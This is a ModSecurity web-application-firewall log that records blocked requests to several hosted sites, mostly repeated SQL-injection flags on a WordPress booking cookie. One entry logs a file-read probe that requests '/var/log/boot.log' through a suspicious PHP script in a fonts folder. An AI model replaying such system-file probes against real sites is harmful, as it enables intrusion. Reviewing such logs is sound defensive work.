[Mon May 11 22:24:15.601844 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI673o_DFxNSZVmaX3PAgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:17.135953 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI68Xo_DFxNSZVmaX3PBAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:17.136241 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI68Xo_DFxNSZVmaX3PBAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:17.719308 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI68Xo_DFxNSZVmaX3PBAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:18.555059 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI68no_DFxNSZVmaX3PBgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:18.555357 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI68no_DFxNSZVmaX3PBgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:19.139975 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI68no_DFxNSZVmaX3PBgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:19.740990 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI683o_DFxNSZVmaX3PCAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:19.741281 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI683o_DFxNSZVmaX3PCAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:20.350944 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI683o_DFxNSZVmaX3PCAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:20.936272 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI69Ho_DFxNSZVmaX3PCgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:20.936558 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI69Ho_DFxNSZVmaX3PCgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:21.514501 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI69Ho_DFxNSZVmaX3PCgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:25.244633 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6-Xo_DFxNSZVmaX3PDwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:25.244932 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6-Xo_DFxNSZVmaX3PDwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:25.932675 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6-Xo_DFxNSZVmaX3PDwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:27.036843 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6-3o_DFxNSZVmaX3PGQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:27.037227 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6-3o_DFxNSZVmaX3PGQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:27.406384 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6-3o_DFxNSZVmaX3PGQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:28.033647 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6_Ho_DFxNSZVmaX3PGwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:28.033962 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6_Ho_DFxNSZVmaX3PGwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:28.615481 2026] [security2:error] [pid 1588898:tid 1588914] [client 216.73.216.110:11387] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20250911"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI6_KFW67LJTsgN3jQLfgAAAA8"]
[Mon May 11 22:24:28.616123 2026] [security2:error] [pid 1588898:tid 1588914] [client 216.73.216.110:11387] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI6_KFW67LJTsgN3jQLfgAAAA8"]
[Mon May 11 22:24:28.708928 2026] [security2:error] [pid 1588898:tid 1588914] [client 216.73.216.110:11387] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI6_KFW67LJTsgN3jQLfgAAAA8"]
[Mon May 11 22:24:28.780222 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6_Ho_DFxNSZVmaX3PGwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:30.258392 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6_no_DFxNSZVmaX3PHwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:30.258682 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6_no_DFxNSZVmaX3PHwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:30.860714 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6_no_DFxNSZVmaX3PHwAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:31.444792 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6_3o_DFxNSZVmaX3PIQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:31.445077 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6_3o_DFxNSZVmaX3PIQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:31.547861 2026] [security2:error] [pid 1590352:tid 1590395] [client 43.157.174.69:55028] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agI6_61q0G_aXAqWauT6cgAAAIM"]
[Mon May 11 22:24:32.033626 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6_3o_DFxNSZVmaX3PIQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:32.747384 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7AHo_DFxNSZVmaX3PIgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:32.747661 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7AHo_DFxNSZVmaX3PIgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:33.287697 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7AHo_DFxNSZVmaX3PIgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:33.531103 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7AXo_DFxNSZVmaX3PIwAAANE"], referer: https://rentparadise.fr/wp-login.php
